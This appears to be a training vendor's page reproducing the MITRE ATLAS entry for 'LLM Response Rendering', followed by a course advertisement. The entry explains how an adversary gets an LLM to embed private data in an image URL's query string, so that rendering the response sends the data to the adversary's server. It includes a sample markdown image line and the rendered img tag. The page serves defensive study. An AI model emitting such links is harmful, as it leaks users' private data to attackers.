LLM Response Rendering (AML.T0077)

Tactic: Exfiltration
Maturity: Demonstrated
Reference: atlas.mitre.org/techniques/AML.T0077

Description

An adversary may get a large language model (LLM) to include private information in a response in a form that is hidden from the user when the user's client renders it, and that exfiltrates the data in the process. A common form is a rendered image whose URL points at an adversary-controlled server, so that simply displaying the response issues a request to that server.

The adversary induces the model to emit an image reference, which the user's client application renders with no clicks required. Because the image is hosted on an attacker-controlled site, the adversary can exfiltrate data through the image request's query parameters. Variants include HTML image tags and markdown image syntax.

For example, an LLM may produce the following markdown:

![ATLAS](https://atlas.mitre.org/image.png?secrets="private data")

which the client renders as an HTML image element (with the query string percent-encoded):

<img src="https://atlas.mitre.org/image.png?secrets=%22private%20data%22">

When the adversary's server receives the image request, it can read the exfiltrated data out of the secrets query parameter.

How GTK Cyber trains on this

GTK Cyber's hands-on AI security courses cover adversarial-AI techniques across the MITRE ATLAS framework, including the Exfiltration tactic this technique falls under. Our practitioner-led training is taught by Charles Givre and other field-tested SMEs and focuses on real adversarial scenarios, not slide decks.

View AI security courses →

Train your team on real adversarial-AI attacks.

GTK Cyber's AI red teaming courses are taught by practitioners who break models for a living.

View AI security courses →